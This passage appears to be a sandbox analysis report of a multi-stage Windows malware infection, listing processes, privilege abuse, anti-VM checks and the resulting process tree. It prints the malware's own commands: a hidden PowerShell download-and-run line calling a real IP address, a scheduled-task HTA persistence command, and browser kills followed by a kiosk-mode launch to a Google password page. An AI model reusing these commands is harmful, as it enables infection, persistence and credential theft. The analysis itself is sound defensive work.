3204	a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe
3204	a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe
3204	a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe
3204	a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe
3204	a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe
2948	9HYL9MT78H11BEUBS5RS.exe
2948	9HYL9MT78H11BEUBS5RS.exe
2436	FP3JIZ5VZ9A4351M35ROS.exe
2436	FP3JIZ5VZ9A4351M35ROS.exe
1368	skotes.exe
1368	skotes.exe
2324	6af0e87655.exe
2324	6af0e87655.exe
2324	6af0e87655.exe
2324	6af0e87655.exe
2324	6af0e87655.exe
2324	6af0e87655.exe
4644	0dbd0563af.exe
4644	0dbd0563af.exe
4256	RLXUGJJ4P6UUVWSQMYWO4338G4QO6.exe
4256	RLXUGJJ4P6UUVWSQMYWO4338G4QO6.exe
2264	LEDL9O6ARTU6REUYW1D.exe
2264	LEDL9O6ARTU6REUYW1D.exe
1248	3524c4f5e2.exe
1248	3524c4f5e2.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1248	3524c4f5e2.exe
1248	3524c4f5e2.exe
3616	skotes.exe
3616	skotes.exe
1856	TempMNZ9GSNUGKJ7KFC3FWUVZTNCSINL6SD1.EXE
1856	TempMNZ9GSNUGKJ7KFC3FWUVZTNCSINL6SD1.EXE
5144	0b65663f1a.exe
5144	0b65663f1a.exe
5692	af53YGc.exe
5692	af53YGc.exe
5692	af53YGc.exe
5692	af53YGc.exe
3648	7fOMOTQ.exe
3648	7fOMOTQ.exe
3648	7fOMOTQ.exe
3648	7fOMOTQ.exe
3648	7fOMOTQ.exe
3648	7fOMOTQ.exe
4536	47793d0d63.exe
4536	47793d0d63.exe
5696	L65uNi1.exe
5696	L65uNi1.exe
5696	L65uNi1.exe
5696	L65uNi1.exe
4536	47793d0d63.exe
4536	47793d0d63.exe
4536	47793d0d63.exe
5944	1VB7gm8.exe
5944	1VB7gm8.exe
5944	1VB7gm8.exe
5944	1VB7gm8.exe
5944	1VB7gm8.exe
5944	1VB7gm8.exe
3356	e9df748b6f.exe
3356	e9df748b6f.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe

Suspicious use of AdjustPrivilegeToken 58 IoCs

description	pid	Process
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	4660	taskkill.exe
Token: SeDebugPrivilege	4788	taskkill.exe
Token: SeDebugPrivilege	4904	taskkill.exe
Token: SeDebugPrivilege	2964	taskkill.exe
Token: SeDebugPrivilege	1480	powershell.exe
Token: SeDebugPrivilege	1584	firefox.exe
Token: SeDebugPrivilege	1584	firefox.exe
Token: SeDebugPrivilege	4536	47793d0d63.exe
Token: SeDebugPrivilege	5504	nAEqBMS.exe
Token: SeDebugPrivilege	2988	cee440c820.exe
Token: SeIncreaseQuotaPrivilege	2988	cee440c820.exe
Token: SeSecurityPrivilege	2988	cee440c820.exe
Token: SeTakeOwnershipPrivilege	2988	cee440c820.exe
Token: SeLoadDriverPrivilege	2988	cee440c820.exe
Token: SeSystemProfilePrivilege	2988	cee440c820.exe
Token: SeSystemtimePrivilege	2988	cee440c820.exe
Token: SeProfSingleProcessPrivilege	2988	cee440c820.exe
Token: SeIncBasePriorityPrivilege	2988	cee440c820.exe
Token: SeCreatePagefilePrivilege	2988	cee440c820.exe
Token: SeBackupPrivilege	2988	cee440c820.exe
Token: SeRestorePrivilege	2988	cee440c820.exe
Token: SeShutdownPrivilege	2988	cee440c820.exe
Token: SeDebugPrivilege	2988	cee440c820.exe
Token: SeSystemEnvironmentPrivilege	2988	cee440c820.exe
Token: SeRemoteShutdownPrivilege	2988	cee440c820.exe
Token: SeUndockPrivilege	2988	cee440c820.exe
Token: SeManageVolumePrivilege	2988	cee440c820.exe
Token: 33	2988	cee440c820.exe
Token: 34	2988	cee440c820.exe
Token: 35	2988	cee440c820.exe
Token: 36	2988	cee440c820.exe
Token: SeIncreaseQuotaPrivilege	2988	cee440c820.exe
Token: SeSecurityPrivilege	2988	cee440c820.exe
Token: SeTakeOwnershipPrivilege	2988	cee440c820.exe
Token: SeLoadDriverPrivilege	2988	cee440c820.exe
Token: SeSystemProfilePrivilege	2988	cee440c820.exe
Token: SeSystemtimePrivilege	2988	cee440c820.exe
Token: SeProfSingleProcessPrivilege	2988	cee440c820.exe
Token: SeIncBasePriorityPrivilege	2988	cee440c820.exe
Token: SeCreatePagefilePrivilege	2988	cee440c820.exe
Token: SeBackupPrivilege	2988	cee440c820.exe
Token: SeRestorePrivilege	2988	cee440c820.exe
Token: SeShutdownPrivilege	2988	cee440c820.exe
Token: SeDebugPrivilege	2988	cee440c820.exe
Token: SeSystemEnvironmentPrivilege	2988	cee440c820.exe
Token: SeRemoteShutdownPrivilege	2988	cee440c820.exe
Token: SeUndockPrivilege	2988	cee440c820.exe
Token: SeManageVolumePrivilege	2988	cee440c820.exe
Token: 33	2988	cee440c820.exe
Token: 34	2988	cee440c820.exe
Token: 35	2988	cee440c820.exe
Token: 36	2988	cee440c820.exe
Token: SeDebugPrivilege	5504	nAEqBMS.exe
Token: SeShutdownPrivilege	5432	chrome.exe
Token: SeCreatePagefilePrivilege	5432	chrome.exe
Token: SeShutdownPrivilege	5432	chrome.exe
Token: SeCreatePagefilePrivilege	5432	chrome.exe

Suspicious use of FindShellTrayWindow 62 IoCs

pid	Process
2436	FP3JIZ5VZ9A4351M35ROS.exe
1248	3524c4f5e2.exe
1248	3524c4f5e2.exe
1248	3524c4f5e2.exe
1248	3524c4f5e2.exe
1248	3524c4f5e2.exe
1248	3524c4f5e2.exe
1864	d8c6daea9c.exe
1864	d8c6daea9c.exe
1864	d8c6daea9c.exe
1248	3524c4f5e2.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1248	3524c4f5e2.exe
1248	3524c4f5e2.exe
1248	3524c4f5e2.exe
1248	3524c4f5e2.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe

Suspicious use of SendNotifyMessage 34 IoCs

pid	Process
1248	3524c4f5e2.exe
1248	3524c4f5e2.exe
1248	3524c4f5e2.exe
1248	3524c4f5e2.exe
1248	3524c4f5e2.exe
1248	3524c4f5e2.exe
1864	d8c6daea9c.exe
1864	d8c6daea9c.exe
1864	d8c6daea9c.exe
1248	3524c4f5e2.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1584	firefox.exe
1248	3524c4f5e2.exe
1248	3524c4f5e2.exe
1248	3524c4f5e2.exe
1248	3524c4f5e2.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1584	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3204 wrote to memory of 2948	3204	a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe	86
PID 3204 wrote to memory of 2948	3204	a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe	86
PID 3204 wrote to memory of 2948	3204	a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe	86
PID 3204 wrote to memory of 2436	3204	a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe	88
PID 3204 wrote to memory of 2436	3204	a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe	88
PID 3204 wrote to memory of 2436	3204	a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe	88
PID 2436 wrote to memory of 1368	2436	FP3JIZ5VZ9A4351M35ROS.exe	89
PID 2436 wrote to memory of 1368	2436	FP3JIZ5VZ9A4351M35ROS.exe	89
PID 2436 wrote to memory of 1368	2436	FP3JIZ5VZ9A4351M35ROS.exe	89
PID 1368 wrote to memory of 2324	1368	skotes.exe	92
PID 1368 wrote to memory of 2324	1368	skotes.exe	92
PID 1368 wrote to memory of 2324	1368	skotes.exe	92
PID 1368 wrote to memory of 4644	1368	skotes.exe	93
PID 1368 wrote to memory of 4644	1368	skotes.exe	93
PID 1368 wrote to memory of 4644	1368	skotes.exe	93
PID 2324 wrote to memory of 4256	2324	6af0e87655.exe	94
PID 2324 wrote to memory of 4256	2324	6af0e87655.exe	94
PID 2324 wrote to memory of 4256	2324	6af0e87655.exe	94
PID 1368 wrote to memory of 1248	1368	skotes.exe	95
PID 1368 wrote to memory of 1248	1368	skotes.exe	95
PID 1368 wrote to memory of 1248	1368	skotes.exe	95
PID 1248 wrote to memory of 1812	1248	3524c4f5e2.exe	97
PID 1248 wrote to memory of 1812	1248	3524c4f5e2.exe	97
PID 1248 wrote to memory of 1812	1248	3524c4f5e2.exe	97
PID 2324 wrote to memory of 2264	2324	6af0e87655.exe	99
PID 2324 wrote to memory of 2264	2324	6af0e87655.exe	99
PID 2324 wrote to memory of 2264	2324	6af0e87655.exe	99
PID 1248 wrote to memory of 4660	1248	3524c4f5e2.exe	100
PID 1248 wrote to memory of 4660	1248	3524c4f5e2.exe	100
PID 1248 wrote to memory of 4660	1248	3524c4f5e2.exe	100
PID 1248 wrote to memory of 4788	1248	3524c4f5e2.exe	102
PID 1248 wrote to memory of 4788	1248	3524c4f5e2.exe	102
PID 1248 wrote to memory of 4788	1248	3524c4f5e2.exe	102
PID 1368 wrote to memory of 1864	1368	skotes.exe	104
PID 1368 wrote to memory of 1864	1368	skotes.exe	104
PID 1368 wrote to memory of 1864	1368	skotes.exe	104
PID 1248 wrote to memory of 4904	1248	3524c4f5e2.exe	105
PID 1248 wrote to memory of 4904	1248	3524c4f5e2.exe	105
PID 1248 wrote to memory of 4904	1248	3524c4f5e2.exe	105
PID 1864 wrote to memory of 3016	1864	d8c6daea9c.exe	107
PID 1864 wrote to memory of 3016	1864	d8c6daea9c.exe	107
PID 1864 wrote to memory of 3016	1864	d8c6daea9c.exe	107
PID 1864 wrote to memory of 2336	1864	d8c6daea9c.exe	108
PID 1864 wrote to memory of 2336	1864	d8c6daea9c.exe	108
PID 1864 wrote to memory of 2336	1864	d8c6daea9c.exe	108
PID 3016 wrote to memory of 3248	3016	cmd.exe	110
PID 3016 wrote to memory of 3248	3016	cmd.exe	110
PID 3016 wrote to memory of 3248	3016	cmd.exe	110
PID 1248 wrote to memory of 2964	1248	3524c4f5e2.exe	111
PID 1248 wrote to memory of 2964	1248	3524c4f5e2.exe	111
PID 1248 wrote to memory of 2964	1248	3524c4f5e2.exe	111
PID 2336 wrote to memory of 1480	2336	mshta.exe	113
PID 2336 wrote to memory of 1480	2336	mshta.exe	113
PID 2336 wrote to memory of 1480	2336	mshta.exe	113
PID 1248 wrote to memory of 4540	1248	3524c4f5e2.exe	114
PID 1248 wrote to memory of 4540	1248	3524c4f5e2.exe	114
PID 4540 wrote to memory of 1584	4540	firefox.exe	116
PID 4540 wrote to memory of 1584	4540	firefox.exe	116
PID 4540 wrote to memory of 1584	4540	firefox.exe	116
PID 4540 wrote to memory of 1584	4540	firefox.exe	116
PID 4540 wrote to memory of 1584	4540	firefox.exe	116
PID 4540 wrote to memory of 1584	4540	firefox.exe	116
PID 4540 wrote to memory of 1584	4540	firefox.exe	116
PID 4540 wrote to memory of 1584	4540	firefox.exe	116

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3448
- C:\Users\Admin\AppData\Local\Temp\a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe
  "C:\Users\Admin\AppData\Local\Temp\a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3204
- - C:\Users\Admin\AppData\Local\Temp\9HYL9MT78H11BEUBS5RS.exe
    "C:\Users\Admin\AppData\Local\Temp\9HYL9MT78H11BEUBS5RS.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2948
- - C:\Users\Admin\AppData\Local\Temp\FP3JIZ5VZ9A4351M35ROS.exe
    "C:\Users\Admin\AppData\Local\Temp\FP3JIZ5VZ9A4351M35ROS.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2436
  - - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1368
    - - C:\Users\Admin\AppData\Local\Temp\1069286001\6af0e87655.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1069286001\6af0e87655.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2324
      - C:\Users\Admin\AppData\Local\Temp\RLXUGJJ4P6UUVWSQMYWO4338G4QO6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RLXUGJJ4P6UUVWSQMYWO4338G4QO6.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4256
      - C:\Users\Admin\AppData\Local\Temp\LEDL9O6ARTU6REUYW1D.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LEDL9O6ARTU6REUYW1D.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2264
    - - C:\Users\Admin\AppData\Local\Temp\1069287001\0dbd0563af.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1069287001\0dbd0563af.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4644
    - - C:\Users\Admin\AppData\Local\Temp\1069288001\3524c4f5e2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1069288001\3524c4f5e2.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:1248
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1812
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4660
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4788
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4904
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2964
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4540
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        7⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:1584
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1948 -parentBuildID 20240401114208 -prefsHandle 1864 -prefMapHandle 1856 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee189139-4520-4b26-a1f8-e7c19010df5a} 1584 "\\.\pipe\gecko-crash-server-pipe.1584" gpu
        8⤵
        
        PID:436
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2400 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4d9942d6-728b-4f3c-94ca-6826519dd0f5} 1584 "\\.\pipe\gecko-crash-server-pipe.1584" socket
        8⤵
        
        PID:5112
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3328 -childID 1 -isForBrowser -prefsHandle 3320 -prefMapHandle 3208 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {75151a40-d25b-4cb8-a8a7-4f926c0a2eca} 1584 "\\.\pipe\gecko-crash-server-pipe.1584" tab
        8⤵
        
        PID:3492
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3928 -childID 2 -isForBrowser -prefsHandle 3924 -prefMapHandle 3920 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80e54ace-4964-4608-b350-3d4bddd14c6d} 1584 "\\.\pipe\gecko-crash-server-pipe.1584" tab
        8⤵
        
        PID:1844
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4920 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4828 -prefMapHandle 4904 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b22d70c-975f-400b-9d31-8c4444eba500} 1584 "\\.\pipe\gecko-crash-server-pipe.1584" utility
        8⤵
        Checks processor information in registry
        
        PID:5200
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5272 -childID 3 -isForBrowser -prefsHandle 5312 -prefMapHandle 5308 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b4319336-8b4f-4fa0-a5a5-0b5f974bceb8} 1584 "\\.\pipe\gecko-crash-server-pipe.1584" tab
        8⤵
        
        PID:5724
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5420 -childID 4 -isForBrowser -prefsHandle 5504 -prefMapHandle 5500 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {41217b6b-4b6e-4e04-85c8-30729c404789} 1584 "\\.\pipe\gecko-crash-server-pipe.1584" tab
        8⤵
        
        PID:5740
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5428 -childID 5 -isForBrowser -prefsHandle 5668 -prefMapHandle 5676 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b78b6787-8c36-453f-abbe-ee949f19505d} 1584 "\\.\pipe\gecko-crash-server-pipe.1584" tab
        8⤵
        
        PID:5752
    - - C:\Users\Admin\AppData\Local\Temp\1069289001\d8c6daea9c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1069289001\d8c6daea9c.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:1864
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn JOtddma8sVT /tr "mshta C:\Users\Admin\AppData\Local\Temp\srWqblPdq.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3016
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn JOtddma8sVT /tr "mshta C:\Users\Admin\AppData\Local\Temp\srWqblPdq.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3248
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\srWqblPdq.hta
        6⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MNZ9GSNUGKJ7KFC3FWUVZTNCSINL6SD1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1480
        
        C:\Users\Admin\AppData\Local\TempMNZ9GSNUGKJ7KFC3FWUVZTNCSINL6SD1.EXE
        
        "C:\Users\Admin\AppData\Local\TempMNZ9GSNUGKJ7KFC3FWUVZTNCSINL6SD1.EXE"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1856
    - - C:\Users\Admin\AppData\Local\Temp\1069290001\0b65663f1a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1069290001\0b65663f1a.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5144
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 644
        6⤵
        Program crash
        
        PID:708
    - - C:\Users\Admin\AppData\Local\Temp\1069291001\af53YGc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1069291001\af53YGc.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:5588
      - C:\Users\Admin\AppData\Local\Temp\1069291001\af53YGc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1069291001\af53YGc.exe"
        6⤵
        Executes dropped EXE
        
        PID:5680
      - C:\Users\Admin\AppData\Local\Temp\1069291001\af53YGc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1069291001\af53YGc.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5692
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 804
        6⤵
        Program crash
        
        PID:5868
    - - C:\Users\Admin\AppData\Local\Temp\1069292001\7fOMOTQ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1069292001\7fOMOTQ.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3648
    - - C:\Users\Admin\AppData\Local\Temp\1069293001\47793d0d63.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1069293001\47793d0d63.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4536
    - - C:\Users\Admin\AppData\Local\Temp\1069294001\L65uNi1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1069294001\L65uNi1.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:5648
      - C:\Users\Admin\AppData\Local\Temp\1069294001\L65uNi1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1069294001\L65uNi1.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5696
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 824
        6⤵
        Program crash
        
        PID:5864
    - - C:\Users\Admin\AppData\Local\Temp\1069295001\1VB7gm8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1069295001\1VB7gm8.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5944
    - - C:\Users\Admin\AppData\Local\Temp\1069297001\e9df748b6f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1069297001\e9df748b6f.exe"
        5⤵
